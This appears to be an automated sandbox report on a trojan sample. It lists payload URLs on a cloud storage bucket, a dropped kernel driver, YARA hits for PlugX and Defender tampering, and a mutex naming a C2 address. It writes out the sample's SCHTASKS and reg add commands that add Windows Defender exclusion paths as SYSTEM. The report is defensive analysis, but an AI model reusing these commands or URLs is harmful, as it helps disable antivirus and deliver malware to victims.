              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif$
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifhttps://662hfg.oss-cn-beijing.aliyuncs.com/b.gifhttp
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifl
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifp
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifi
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/A5
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif$
              Source: 2976587-987347589.08.exe, 00000000.00000003.1791213251.0000000000E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat(
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/j
              Source: 2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/pV
              Source: 2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/v
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0)
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
              Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.9:49973 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49985 version: TLS 1.2

              System Summary

              barindex
              Source: 7.2.XY3LL0.exe.2890000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 42.2.byHW9q.exe.33c0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
              Source: tbcore3U.dll.8.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.8.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.8.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.42.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.42.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.42.drStatic PE information: section name: .mo:
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140006C95 NtAllocateVirtualMemory,7_2_0000000140006C95
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000C3F07_2_000000014000C3F0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000CC007_2_000000014000CC00
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140001A307_2_0000000140001A30
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000C2A07_2_000000014000C2A0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400022C07_2_00000001400022C0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400110F07_2_00000001400110F0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140010CF07_2_0000000140010CF0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400093007_2_0000000140009300
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_000000014000BB707_2_000000014000BB70
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140003F807_2_0000000140003F80
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00000001400103D07_2_00000001400103D0
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDF9A1B87_2_00007FF8FDF9A1B8
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_00007FF8FDFA02487_2_00007FF8FDFA0248
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCode function: 44_2_00634AE244_2_00634AE2
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\byHW9q\byHW9q.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2976587-987347589.08.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: 7.2.XY3LL0.exe.2890000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 42.2.byHW9q.exe.33c0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: Process Memory Space: byHW9q.exe PID: 7708, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
              Source: 189atohci.sys.0.drBinary string: \Device\Driver\
              Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.evad.winEXE@65/29@12/3
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,7_2_0000000140003F80
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,7_2_0000000140001430
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
              Source: C:\Users\user\Documents\XY3LL0.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
              Source: C:\Users\user\Documents\XY3LL0.exeFile created: C:\Program Files (x86)\byHW9qJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].datJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3492:120:WilError_03
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:356:120:WilError_03
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.47.169:8917:Sauron
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3360:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_888683
              Source: C:\Users\user\Documents\XY3LL0.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: ^wu44_2_00631000
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: tbcore3.dll44_2_00631000
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: tbcore3.dll44_2_00631000
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: tbcore3U.dll44_2_00631000
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: tbcore3U.dll44_2_00631000
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeCommand line argument: .c44_2_00632E30
              Source: 2976587-987347589.08.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Documents\XY3LL0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 2976587-987347589.08.exeVirustotal: Detection: 16%
              Source: byHW9q.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: byHW9q.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: byHW9q.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: byHW9q.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: byHW9q.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: byHW9q.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeFile read: C:\Users\user\Desktop\2976587-987347589.08.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2976587-987347589.08.exe "C:\Users\user\Desktop\2976587-987347589.08.exe"
              Source: unknownProcess created: C:\Users\user\Documents\XY3LL0.exe C:\Users\user\Documents\XY3LL0.exe
              Source: unknownProcess created: C:\Users\user\Documents\XY3LL0.exe C:\Users\user\Documents\XY3LL0.exe
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
              Source: unknownProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
              Source: unknownProcess created: C:\Program Files (x86)\x736Pg9\QmbK8U.exe "C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
